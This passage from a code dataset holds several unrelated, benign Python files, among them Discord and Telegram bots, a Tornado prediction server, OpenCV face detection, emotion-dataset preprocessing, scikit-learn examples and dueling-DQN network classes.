lines\".format(len(todo_lines), line_no))\n return todo_lines\n elif got_todo:\n if len(line.strip()) > 3:\n d(\"Found todo: '{0}' at line {1}\".format(line.rstrip(), line_no))\n todo_lines.append(line.rstrip())\n else:\n d(\"Skipping blank/short todo line {0}\".format(line_no))\n elif get_todo_regex().search(line):\n d(\"Found start of todo list at line {0}\".format(line_no))\n got_todo = True\n raise RuntimeError(\"End of file reached while searching for complete todo block\")\n\ndef last_date(logfile):\n d(\"Rewinding logfile to beginning, searching for the most recent date entry\")\n logfile.seek(0)\n fmt = get_date_fmt()\n _max = MAX_SEARCH\n for line in logfile:\n _max -= 1\n if _max <= 0:\n raise RuntimeError(\"Could not find a date line in first {0} lines\".format(MAX_SEARCH))\n try:\n found_date = datetime.datetime.strptime(str(line.strip()), fmt).date()\n d(\"Found date line {0}, parsed into {1}\".format(MAX_SEARCH-_max, found_date))\n return found_date\n except ValueError:\n continue\n\ndef get_prefix(todo):\n d(\"Formatting new section with {0} todo lines\".format(len(todo)))\n fmt = get_date_fmt()\n return (\"\\n\" # blank line\n \"{0}\\n\" # ToDo:\n \"{1}\" # todo items\n \"\\n\" # blank line\n \"\\n\" # blank line\n \"{2}\\n\" # Did:\n \"\\n\" # blank line\n \"\\n\" # blank line\n \"{3}\" # start line includes newline\n \"{4}\\n\" # date/time\n \"{5}\" # end line includes newline\n \"\\n\" # extra blank line\n \"\".format(TODO, \"\\n\".join(todo), DID,\n SEP_START, time.strftime(fmt), SEP_END))\n\nif __name__ == \"__main__\":\n d(\"Debugging enabled, parsing arguments\")\n if len(sys.argv) < 2:\n show_usage()\n sys.exit(1)\n d(\"Checking if it's Saturday or Sunday\")\n weekday = datetime.datetime.now().isoweekday()\n # 0=mon, 1=tue, 2=wed, 3=thu, 4=fri, 5=sat, 6=sun\n if weekday > 5: # After Friday\n d(\"Exiting, weekends are not workdays\")\n sys.exit(0)\n tmp = tempfile.NamedTemporaryFile(mode=\"wt\", encoding='utf8',\n prefix=os.path.basename(sys.argv[0]), suffix='.tmp')\n d(\"Opened temp file {0}\".format(tmp.name))\n logfile = open(sys.argv[1], \"rt\", encoding='utf8')\n d(\"Opened log file {0}\".format(logfile.name))\n if last_date(logfile) == datetime.datetime.now().date():\n d(\"File already contains entry for today, exiting.\")\n sys.exit(0)\n old_todo = last_todo(logfile)\n tmp.write(get_prefix(old_todo))\n tmp.flush()\n d(\"New entry added, copying old file contents into temp file\")\n logfile.seek(0)\n shutil.copyfileobj(logfile, tmp)\n logfile.close()\n tmp.flush()\n d(\"Creating backup of logfile with ~ suffix\")\n shutil.copy(sys.argv[1], sys.argv[1] + '~')\n d(\"Movin new logfile into place\")\n shutil.copy(tmp.name, sys.argv[1])\n","repo_name":"Yewess/home","sub_path":"bin/BrandNewDay.py","file_name":"BrandNewDay.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30887068","text":"import discord\nfrom discord.utils import get\n\n# gets the Token from .env (more infos in README and .env.example)\nf = open(\".env\")\nTOKEN = f.read()\n\n# Variables to change\nverify_channel_name = 'verify'\nverify_prefix = '!verify'\nverify_emoji = '✅'\nverify_role = 847062220328534036\nverify_permission = 'Admin'\n\n# create Bot Class\nclass VerifyBot(discord.Client):\n \n # set class variable 'role'\n role = 0\n\n # if the bot is ready\n async def on_ready(self):\n self.profile_picture = client.user.avatar_url\n print('Verify: logged in')\n\n # if someone reacted\n async def on_reaction_add(self, reaction, user):\n # if the message is in the verify channel\n if reaction.message.channel.name == verify_channel_name:\n # if the reaction is the verify reaction\n if str(reaction) == verify_emoji:\n # get the role\n self.role = discord.utils.get(user.guild.roles, id=verify_role)\n # give the user the role\n await user.add_roles(self.role)\n\n # if someone send a message\n async def on_message(self, message):\n # get the channel\n channel = client.get_channel(message.channel.id)\n # if the channel si the right one\n if message.channel.name == verify_channel_name:\n # get the user\n user = message.author\n # get the role\n self.role = discord.utils.get(user.guild.roles, id=verify_role)\n\n # if someone whant to send the button\n if message.content == '!verify':\n\n # if the author has the permisson to do that\n for role in user.roles:\n if str(role) == verify_permission:\n # delete the message\n await message.delete()\n\n # create the verify embed\n verify_embed = discord.Embed(colour=discord.Colour(0x29485e), description=\"By clicking/tapping on \" + verify_emoji + \" below, you agree with the rules on this server. You can also verify by typing agree if clicking/tapping the reaction doesn't work.\")\n\n verify_embed.set_author(name=\"Verify \", icon_url=self.profile_picture)\n # send the embed\n await channel.send(embed=verify_embed)\n \n # if someone type agree in the chat\n elif message.content == 'agree':\n # delete the message\n await message.delete()\n # give the verified role\n await user.add_roles(self.role)\n\n # if the message is another message\n elif message.content != '!verify' and message.author != client.user:\n await message.delete()\n\n\n elif message.author == client.user:\n channel = message.channel\n # add the button\n await message.add_reaction(verify_emoji)\n\n # if the message is with info\n if message.content == verify_prefix + ' info':\n # creates the info embed\n info_embed = discord.Embed(title=\"Here you can get the most information about this bot!\",\n colour=discord.Colour(0x29485e))\n info_embed.set_author(name=\"Verifybot Info\",\n icon_url=self.profile_picture)\n info_embed.add_field(name=\"General ❕:\",\n value=\"In general this bot is a private project. I made the bot in my freetime.\",\n inline=True)\n info_embed.add_field(name=\"Personalize ✏:\",\n value=\"You can personalize this bot by download the code from github (https://github.com/Fynnyx/discord.py-bots) and run it by yourself.\",\n inline=True)\n info_embed.add_field(name='GitHub:',\n value='Want to use more bots? Visit https://github.com/Fynnyx/discord.py-bots to get more open source Discord bots.',\n inline=True)\n info_embed.add_field(name=\"Help Command 📜:\",\n value=\"The bot prefix is `\" + verify_prefix + \"`. You will use this in front off all other commands. More infos you'll get by using `\" + verify_prefix + \" help`.\",\n inline=True)\n info_embed.add_field(name=\"Everything done? \", value=\"Have fun ❤\", inline=False)\n # sends the info embed\n await channel.send(embed=info_embed)\n\n if message.content == verify_prefix + ' help':\n # create the embed for help\n help_embed = discord.Embed(colour=discord.Colour(0x29485e))\n\n help_embed.set_author(name=\"Verifybot Help\",\n icon_url=self.profile_picture)\n\n help_embed.add_field(name=\"Send the verify button\",\n value=\"With `\" + verify_prefix + \"` You can send the verify button.\")\n help_embed.add_field(name=\"Agree hte rules\",\n value=\"By typing `agree` in the right channel, you agree the rules\")\n # sends the embed\n await channel.send(embed=help_embed)\n\n\n\n\n# start the bot\nclient = VerifyBot()\nclient.run(TOKEN)","repo_name":"iWANTdata/discord.py-bots","sub_path":"verifybot/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74864303731","text":"#! /usr/bin/env python3\n# coding:utf-8\nimport json\n\nimport tornado.web\nimport tornado.ioloop\nimport engine_for_cnn as engine\nimport tensorflow as tf\n\n\nclass MainHandler(tornado.web.RequestHandler):\n\n def get(self):\n text = self.get_argument('text')\n print(text)\n predict = self.classify(text)\n data = {\n 'text': text,\n 'predict': predict[0]\n }\n self.write(json.dumps({'data': data}).encode('utf-8'))\n\n def classify(self, text):\n sample = engine.text_tensor(text, engine.wv)\n tensor_proto = tf.contrib.util.make_tensor_proto(sample, shape=[1, len(sample[0]), 200])\n engine.request.inputs['x'].CopyFrom(tensor_proto)\n response = engine.stub.Predict(engine.request, 10.0)\n result = list(response.outputs['y'].int64_val)\n return result\n\n\ndef make_app():\n return tornado.web.Application([\n (r\"/predict\", MainHandler),\n ])\n\n\nif __name__ == '__main__':\n app = make_app()\n app.listen(909)\n print('listen start')\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"Tryking/DeepLearning","sub_path":"text-antispam/serving/serving.py","file_name":"serving.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73536094453","text":"from cv2 import cv2\r\n\r\nimport numpy as np\r\n\r\ncv2.namedWindow(\"faceCatch\")\r\n\r\ncap=cv2.VideoCapture(0) \r\n# cap=cv2.VideoCapture(\"http://admin:admin@192.168.25.62:8081/video\") \r\n\r\n\r\nsuccess, frame = cap.read()\r\n\r\ncolor = (0,255,0)\r\n\r\nclassfier=cv2.CascadeClassifier(\"C:\\\\Users\\\\w_zhangtb\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python38\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_alt.xml\")\r\n\r\nwhile success:\r\n\r\n success, frame = cap.read()\r\n\r\n size=frame.shape[:2]\r\n\r\n image=np.zeros(size,dtype=np.float16)\r\n\r\n frame = cv2.flip(frame, 1)\r\n\r\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n cv2.equalizeHist(image, image)\r\n\r\n divisor=8\r\n\r\n h, w = size\r\n\r\n minSize =(w//divisor, h//divisor) \r\n\r\n faceRects = classfier.detectMultiScale(image, 1.2, 2, cv2.CASCADE_SCALE_IMAGE,minSize)\r\n\r\n if len(faceRects)>0:\r\n\r\n for faceRect in faceRects: \r\n\r\n x, y, w, h = faceRect\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), color)\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(frame, \"FaceShowing...\",(x + 40, y + 40), font, 0.7, (255,0,255),2)\r\n\r\n cv2.imshow(\"faceCatch\", frame)\r\n\r\n key=cv2.waitKey(10)\r\n\r\n c = chr(key & 255)\r\n\r\n if c in ['q', 'Q', chr(27)]:\r\n\r\n break\r\n\r\ncv2.destroyWindow(\"faceCatch\")","repo_name":"kingdeeztb/pythonapp","sub_path":"kface人脸识别/realFaceshow.py","file_name":"realFaceshow.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24984416427","text":"import telebot\nfrom telebot import types\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport decimal\n\nbot = telebot.TeleBot(\"\")\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n item_1 = types.KeyboardButton(\"Exchange Rates\")\n item_2 = types.KeyboardButton(\"Weather Forecast\")\n markup.add(item_1)\n markup.add(item_2)\n name = message.from_user.first_name\n bot.send_message(message.chat.id, f'Hello {name}! My name is Randy_Rozz_Bot and I am a your personal bot! What do you want to know? Type \"/info\" for more information', reply_markup=markup)\n\n@bot.message_handler(commands=['info'])\ndef start_message(message):\n bot.send_message(message.chat.id, \"Exchange rates - to check today`s rates \\nWeather Forecast - to check today`s forecast\")\n\n@bot.message_handler(content_types='text')\ndef message_reply(message):\n if message.text == \"Exchange Rates\":\n\n html_bg = urlopen(\"https://myfin.by/bank/belgazprombank/usd\")\n soup_bg = BeautifulSoup(html_bg)\n tags = soup_bg.findAll(\"td\")\n buy_bg = tags[1].text\n sell_bg = tags[2].text\n\n bot.send_message(message.chat.id, f\"In Belgazprombank: buying rate - {buy_bg} BYN, selling rate - {sell_bg} BYN\")\n\n html_pr = urlopen(\"https://myfin.by/bank/priorbank/usd\")\n soup_pr = BeautifulSoup(html_pr)\n tags = soup_pr.findAll(\"td\")\n buy_pr = tags[1].text\n sell_pr = tags[2].text\n \n bot.send_message(message.chat.id, f\"In Priorbank: buying rate - {buy_pr} BYN, selling rate - {sell_pr} BYN\")\n\n buying_pr = decimal.Decimal(buy_pr)\n selling_pr = decimal.Decimal(sell_pr)\n buying_bg = decimal.Decimal(buy_bg)\n selling_bg = decimal.Decimal(sell_bg)\n\n if buying_pr - buying_bg > 0:\n bot.send_message(message.chat.id, f\"Best buying rate in Priorbank - {buy_pr} BYN!\")\n elif buying_pr - buying_bg == 0:\n bot.send_message(message.chat.id, f\"Buying rates are equal!\")\n else:\n bot.send_message(message.chat.id, f\"Best buying rate in Belgazprombank - {buy_bg} BYN!\")\n \n if selling_pr - selling_bg > 0:\n bot.send_message(message.chat.id, f\"Best selling rate in Belgazprombank - {sell_bg} BYN!\")\n elif selling_pr - selling_bg == 0:\n bot.send_message(message.chat.id, f\"Selling rates are equal!\")\n else:\n bot.send_message(message.chat.id, f\"Best selling rate in Priorbank - {sell_pr} BYN!\")\n \n if message.text == \"Weather Forecast\":\n\n html_weather = urlopen(\"https://mogilev.online/2022/11/16/252495.html\")\n soup_weather = BeautifulSoup(html_weather)\n tags_weather = soup_weather.findAll(\"li\", {\"class\": \"weather-temp\"})\n weather = tags_weather[0].text\n now = int(weather)\n\n if now <= 10:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, please, dress warmly!\")\n elif now > 10 and now <= 15:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, it`s a pleasant!\")\n elif now > 15 and now <= 25:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, welcome to spring!\")\n elif now > 25:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, dress up it`s will be hot\")\n\nbot.polling()\n","repo_name":"RandyR0zz/Python_course","sub_path":"Projects/Telegram_Daily_Bot/telegram_daily_bot.py","file_name":"telegram_daily_bot.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31790861551","text":"\"\"\"\n그럼 다솜아 이제 진정한 포켓몬 마스터가 되기 위해 도감을 완성시키도록 하여라.\n일단 네가 현재 가지고 있는 포켓몬 도감에서 포켓몬의 이름을 보면 포켓몬의 번호를 말하거나,\n포켓몬의 번호를 보면 포켓몬의 이름을 말하는 연습을 하도록 하여라. 나의 시험을 통과하면, 내가 새로 만든 도감을 주도록 하겠네.\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ndigit = dict()\nalpha = dict()\n\nfor i in range(1, N+1):\n name = input().rstrip()\n digit[i] = name\n alpha[name] = i\n\nfor i in range(M):\n question = input().rstrip()\n if question.isdigit():\n print(digit[int(question)])\n else:\n print(alpha[question])\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27802882665","text":"from enum import Enum\nfrom types import TracebackType\nfrom typing import Any, Awaitable, Optional, Type, TypeVar\n\nfrom httpx import AsyncClient\n\nfrom nbr.api import JupyterAPI\nfrom nbr.kernel import Kernel\nfrom nbr.notebook import Notebook\nfrom nbr.schemas.result import RunResult\nfrom nbr.schemas.session import CreateSession, Session\nfrom nbr.utils.client import create_client, prepare_headers\nfrom nbr.utils.session import create_session, delete_session\n\nTNotebookRunner = TypeVar(\"TNotebookRunner\", bound=\"NotebookRunner\")\n\n\nclass RunnerState(Enum):\n UNOPENED = 1\n OPENED = 2\n CLOSED = 3\n\n\nclass NotebookRunner:\n def __init__(\n self,\n *,\n notebook: Notebook,\n on_notebook_start: Optional[Awaitable[Any]] = None,\n on_notebook_end: Optional[Awaitable[Any]] = None,\n jupyter_api: JupyterAPI = JupyterAPI(),\n ) -> None:\n self._state: RunnerState = RunnerState.UNOPENED\n\n self.notebook: Notebook = notebook\n\n self.on_notebook_start = on_notebook_start\n self.on_notebook_finish = on_notebook_end\n\n self.jupyter_api = jupyter_api\n\n self._client: AsyncClient = create_client(\n base_url=f\"http://{self.jupyter_api.host}:{self.jupyter_api.port}/api\",\n headers=prepare_headers(self.jupyter_api.token),\n )\n\n self._session: Session\n self._kernel: Kernel\n\n async def execute_all_cells(self) -> RunResult:\n if self._state != RunnerState.OPENED:\n raise RuntimeError(\"Create NotebookRunner instance first.\")\n\n if self.on_notebook_start:\n await self.on_notebook_start\n\n run_result = await self._kernel.execute(cells=self.notebook.cells)\n self.notebook.cells = run_result.cells\n\n if self.on_notebook_finish:\n await self.on_notebook_finish\n\n return run_result\n\n async def __aenter__(self: TNotebookRunner) -> TNotebookRunner:\n if self._state != RunnerState.UNOPENED:\n raise RuntimeError(\n \"Cannot create a NotebookRunner instance more than once.\",\n )\n\n self._state = RunnerState.OPENED\n self._session = await create_session(\n session_data=CreateSession(\n name=self.notebook.name, path=self.notebook.path\n ),\n client=self._client,\n )\n self._kernel = Kernel(session=self._session)\n await self._kernel.start(\n base_url=f\"{self.jupyter_api.host}:{self.jupyter_api.port}/api\"\n )\n\n return self\n\n async def __aexit__(\n self,\n exc_type: Type[BaseException],\n exc_value: BaseException,\n traceback: TracebackType,\n ) -> None:\n await delete_session(session_id=self._session.id, client=self._client)\n\n self._state = RunnerState.CLOSED\n","repo_name":"zhivykh/nbr","sub_path":"nbr/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31977695594","text":"print('Lojas Tabajara')\npreço=float(input('Produto 1 : R$ '))\nsoma=0\ndinheiro=0\ntroco=0\naux=preço\ncont=1\nwhile preço != 0 :\n cont=cont +1\n print('Produto', cont,end=' ')\n preço=float(input(': R$ '))\n soma= soma + preço\n if preço == 0 :\n print('Total: R$', soma + aux)\n dinheiro=float(input('Dinheiro: R$ '))\n troco=dinheiro - soma - aux\n print('Troco: R$', troco)","repo_name":"aly50n/Python-Algoritmos-2019.2","sub_path":"lista03ex20.py","file_name":"lista03ex20.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16651283407","text":"from keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nimport os\n\nbase_dir = 'C://DeepLearningData/dogs-vs-cats/train'\nfn = os.path.join(base_dir, 'dog.132.jpg')\n\ndatagen = ImageDataGenerator(\n height_shift_range=0.2,\n width_shift_range=0.2,\n zoom_range=0.2,\n shear_range=0.1,\n rotation_range=20,\n horizontal_flip=True\n)\n\nimage = np.expand_dims(Image.open(fn), 0)\n\naug_iter = datagen.flow(image)\naug_images = [next(aug_iter)[0].astype(np.uint8) for i in range(10)]\n\nfor i in range(10):\n plt.figure(i)\n plt.imshow(aug_images[i])\n\nplt.show()","repo_name":"tjwldnjss13/CNN","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43193206651","text":"# 要添加一个新单元,输入 '# %%'\n# 要添加一个新的标记单元,输入 '# %% [markdown]'\n\n# # IEMOCAP数据处理\n\n# 数据包括视频、音频、文本。视频是以对话形式录制的。\n\n\n\nimport os\nimport json\nimport re\nimport os\nimport pandas as pd\n\n\ndata_path = 'D:\\dataset\\IEMOCAP_full_release\\IEMOCAP_full_release'\n\n\n#获取数据标签\ndef get_labels(data_path):\n # 从每一个session的ialog\\\\EmoEvaluation中获取每一句话的标签,结果输出到iemocap_label.csv文件中\n info_line = re.compile(r'\\[.+\\]\\n', re.IGNORECASE)\n start_times, end_times, wav_file_names, emotions, vals, acts, doms = [], [], [], [], [], [], []\n for sess in range(1, 6):\n emo_evaluation_dir = data_path+'\\\\Session{}\\\\dialog\\\\EmoEvaluation\\\\'.format(sess)\n evaluation_files = [l for l in os.listdir(emo_evaluation_dir) if 'Ses' in l]\n for file in evaluation_files:\n with open(emo_evaluation_dir + file) as f:\n content = f.read()\n info_lines = re.findall(info_line, content)\n for line in info_lines[1:]: # the first line is a header\n start_end_time, wav_file_name, emotion, val_act_dom = line.strip().split('\\t')\n start_time, end_time = start_end_time[1:-1].split('-')\n val, act, dom = val_act_dom[1:-1].split(',')\n val, act, dom = float(val), float(act), float(dom)\n start_time, end_time = float(start_time), float(end_time)\n start_times.append(start_time)\n end_times.append(end_time)\n wav_file_names.append(wav_file_name)\n emotions.append(emotion)\n vals.append(val)\n acts.append(act)\n doms.append(dom)\n df_iemocap = pd.DataFrame(columns=['starttime', 'endtime', 'sentence', 'emotion', 'val', 'act', 'dom'])\n df_iemocap['starttime'] = start_times\n df_iemocap['endtime'] = end_times\n df_iemocap['sentence'] = wav_file_names\n df_iemocap['emotion'] = emotions\n df_iemocap['val'] = vals\n df_iemocap['act'] = acts\n df_iemocap['dom'] = doms\n print(df_iemocap.tail())\n df_iemocap.to_csv(data_path+'\\\\pre_processed\\\\iemocap_label.csv', index=False) \n\n# 音频文件处理.wav\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ## 文本数据处理\n# \n# 将文本整理保存为JSON文件,数据格式如下\n# \"Session1\": sessionm名\n# {\"Ses01F_impro01\":文件名 \n# [{\"sentence\": \"Ses01F_impro01_F000\", \"startime\": \"006.2901\", \"endtime\": \"008.2357\", \"text\": \"Excuse me.\"}, 话语信息包括句话语编号,起始时间,结束时间,文本内容\n# {\"sentence\": \"Ses01F_impro01_M000\", \"startime\": \"007.5712\", \"endtime\": \"010.4750\", \"text\": \"Do you have your forms?\"},\n# ...],\n# \"Ses01F_impro02\": \n# [{\"sentence\": \"Ses01F_impro02_F000\", \"startime\": \"007.2688\", \"endtime\": \"016.6000\", \"text\": \"Did you get the mail? So you saw my letter?\"},\n# ...],\n# ...\n# }\n# \"Session2\":\n# {\n# ...\n# }\n# ...\ndef get_textJSON(data_path):\n text_dir ={}\n iemocap_filename = {}\n for i in range(5):\n list_path = data_path + '\\\\Session'+str(i+1)+'\\\\dialog\\\\transcriptions'\n session_dir = {}\n txt_list = os.listdir(list_path)\n for txt in txt_list:\n txt_path = os.path.join(list_path,txt)\n with open(txt_path,'r',encoding=\"utf-8\") as f:\n linelist = f.read().split(\"\\n\")\n result =[]\n for line in linelist:\n if len(line) > 30 and \"]:\" in line:\n sentence = line.split(' ')[0]\n startime = line.split(\" \")[1].split('-')[0][1:]\n endtime = line.split(\" \")[1].split('-')[1][:-2]\n text = line.split(\"]: \")[1]\n item = {\n 'sentence':sentence,\n 'startime':startime,\n 'endtime':endtime,\n 'text':text\n }\n result.append(item)\n session_dir[txt[:-4]] = result\n iemocap_filename['Session'+ str(i+1)] = txt_list\n text_dir['Session'+ str(i+1)] = session_dir\n #将文本保存为json \n with open('IEMOCAP_text.json', 'w') as dump_f:\n json.dump(text_dir,dump_f)\n #将iemocap数据库中的文件名,即视频,音频,文本名字保存\n with open('iemocap_filename.json', 'w') as dump_f:\n json.dump(iemocap_filename,dump_f) \n\n\n# 读取JSON文件\n# with open('IEMOCAP_text.json', 'r',encoding=\"utf-8\") as load_f:\n# text = json.load(load_f)\n# print(text['Session1'][\"Ses01F_impro01\"][0])\n\nif __name__ =='__main__':\n #获取标签\n # get_labels(data_path)\n #获取文本数据\n get_textJSON(data_path)\n","repo_name":"lishuai-lws/PretrainedMultimodal","sub_path":"IEMOCAP/dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21072182649","text":"from sklearn.datasets import load_iris, fetch_20newsgroups, load_boston\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import classification_report\nimport pandas as pd\nimport numpy as np\n\n\n# li = load_iris()\n# #\n# # print(li.data)\n# # print(li.target)\n# # print(li.feature_names)\n# # print(li.target_names)\n#\n# # 数据集的划分, 训练集的特征值,测试集的特征值,训练集的目标值,测试集的目标值\n# # x_train, x_test, y_train, y_test = train_test_split(li.data, li.target, test_size=0.25, random_state=24)\n# #\n# #\n# # x_train1, x_test1, y_train1, y_test1= train_test_split(li.data, li.target, test_size=0.25, random_state=24)\n# #\n# # print(x_train == x_train1)\n#\n#\n# # news = fetch_20newsgroups(subset='all')\n# #\n# # print(news.data)\n#\n#\n# lb = load_boston()\n#\n# print(lb.data)\n# print(lb.target)\n\n\ndef knncls():\n \"\"\"\n K-近邻算法实现入住\n :return: None\n \"\"\"\n # 获取数据,分析数据\n data = pd.read_csv(\"./data/FBlocation/train.csv\")\n\n # print(data)\n\n # 缩小数据的范围,防止运算时间过长\n data = data.query(\"x > 1.0 & x < 1.25 & y > 2.5 & y < 2.75\")\n\n # 处理时间日期,分割时间,增加一些日期的详细特征\n time_value = pd.to_datetime(data['time'], unit='s')\n\n # 把时间格式转换成字典格式,获取年,月,日\n time_value = pd.DatetimeIndex(time_value)\n\n # 构造新的特征,weekday, day ,hour\n data['weekday'] = time_value.weekday\n data['day'] = time_value.day\n data['hour'] = time_value.hour\n\n data = data.drop(['time'], axis=1)\n\n # 删除一些签到位置少的签到点\n place_count = data.groupby('place_id').aggregate(np.count_nonzero)\n tf = place_count[place_count.row_id > 3].reset_index()\n\n data = data[data['place_id'].isin(tf.place_id)]\n\n # 取出特征值和目标值\n y = data['place_id']\n\n x = data.drop(['place_id'], axis=1)\n\n\n # 进行数据的分割\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)\n\n # 进行标准化\n std = StandardScaler()\n\n x_train = std.fit_transform(x_train)\n\n # x_test = std.fit_transform(x_test)\n x_test = std.transform(x_test)\n\n # estimaotr估计器流程\n knn = KNeighborsClassifier()\n\n # # fit数据\n # knn.fit(x_train, y_train)\n #\n # # 预测结果\n #\n # # 得出准确率\n # score = knn.score(x_test, y_test)\n\n param = {\"n_neighbors\": [1, 3, 5]}\n\n # 使用网格搜索\n gs = GridSearchCV(knn, param_grid=param, cv=2)\n\n # 输入数据\n gs.fit(x_train, y_train)\n\n # 得出测试集的准确率\n print(\"测试集的准确率:\", gs.score(x_test, y_test))\n\n print(\"在交叉验证当���的最好验证结果:\", gs.best_score_)\n\n print(\"选择了模型:\", gs.best_estimator_)\n\n print(\"每个超参数每一个交叉验证:\", gs.cv_results_)\n\n return None\n\n\ndef navie_bayes():\n \"\"\"\n 朴素贝叶斯对新闻分类\n :return: None\n \"\"\"\n # 获取新闻的数据集\n news = fetch_20newsgroups(subset='all')\n\n # 进行数据集的分割\n x_train, x_test, y_train, y_test = train_test_split(news.data, news.target, test_size=0.25)\n\n # 进行特征抽取\n tf = TfidfVectorizer()\n\n x_train = tf.fit_transform(x_train)\n\n x_test = tf.transform(x_test)\n\n # 进行朴素贝叶斯分类\n mlb = MultinomialNB(alpha=1.0)\n\n mlb.fit(x_train, y_train)\n\n y_predict = mlb.predict(x_test)\n\n print(\"预测的文章类型结果:\", y_predict)\n\n score = mlb.score(x_test, y_test)\n\n print(\"准确率:\", score)\n\n print(classification_report(y_test, y_predict, target_names=news.target_names))\n\n return None\n\n\nif __name__ == \"__main__\":\n knncls()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lmlzk/ML","sub_path":"ML_study/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37012218895","text":"from tracemalloc import start\nimport torch\nfrom torch import nn\nimport random\nimport numpy as np\n\n\nclass QNet_FC(nn.Module):\n \"\"\"\n Use this model for non-image based inputs\n \"\"\"\n\n def __init__(self, obs, action_space):\n super(QNet_FC, self).__init__()\n self.feature_layer = nn.Sequential(\n nn.Linear(obs, 512),\n nn.ReLU(),\n nn.Linear(512, 256),\n nn.ReLU(),\n )\n\n self.advantage_stream = nn.Sequential(\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, action_space),\n )\n \n self.value_stream = nn.Sequential(\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 1),\n )\n\n def forward(self, x):\n # Dueling DQN\n features = self.feature_layer(x)\n advantages = self.advantage_stream(features)\n values = self.value_stream(features)\n if advantages.dim() == 1:\n advantage_mean = advantages.mean(dim=0, keepdim=True)\n else:\n advantage_mean = advantages.mean(dim=1, keepdim=True)\n \n return values + (advantages - advantage_mean)\n\n\nclass QNet_FC_Hyperbolic(nn.Module):\n \"\"\"\n Use this model for non-image based inputs\n \"\"\"\n\n def __init__(self, obs, action_space, number_of_gammas):\n super(QNet_FC_Hyperbolic, self).__init__()\n \n self.number_of_gammas = number_of_gammas\n \n self.feature_layer = nn.Sequential(\n nn.Linear(obs, 512),\n nn.ReLU(),\n nn.Linear(512, 256),\n nn.ReLU(),\n )\n \n self.advantages_hidden = nn.Sequential(\n nn.Linear(256, 256),\n nn.ReLU(),\n )\n \n self.values_hidden = nn.Sequential(\n nn.Linear(256, 256),\n nn.ReLU(),\n )\n\n self.advantage_out_layers = []\n self.value_out_layers = []\n for _ in range(number_of_gammas):\n self.advantage_out_layers.append(nn.Sequential(nn.Linear(256, action_space)))\n self.value_out_layers.append(nn.Sequential(nn.Linear(256, 1)))\n \n\n def forward(self, x):\n # Dueling DQN\n features = self.feature_layer(x)\n \n advantages_hidden_out = self.advantages_hidden(features)\n values_hidden_out = self.values_hidden(features)\n \n out_list = np.empty(self.number_of_gammas, dtype=torch.Tensor)\n for gamma_num in range(self.number_of_gammas):\n value = self.value_out_layers[gamma_num](values_hidden_out)\n \n advantages = self.advantage_out_layers[gamma_num](advantages_hidden_out)\n \n if advantages.dim() == 1:\n advantage_mean = advantages.mean(dim=0, keepdim=True)\n else:\n advantage_mean = advantages.mean(dim=1, keepdim=True)\n \n out_list[gamma_num] = value + (advantages - advantage_mean)\n \n out_tensor = torch.stack(tuple(out_list))\n \n return out_tensor\n\n\nclass QNet_Nature_CNN(nn.Module):\n \"\"\"\n Use this model for image based inputs\n \"\"\"\n\n def __init__(self, obs, action_space):\n super(QNet_Nature_CNN, 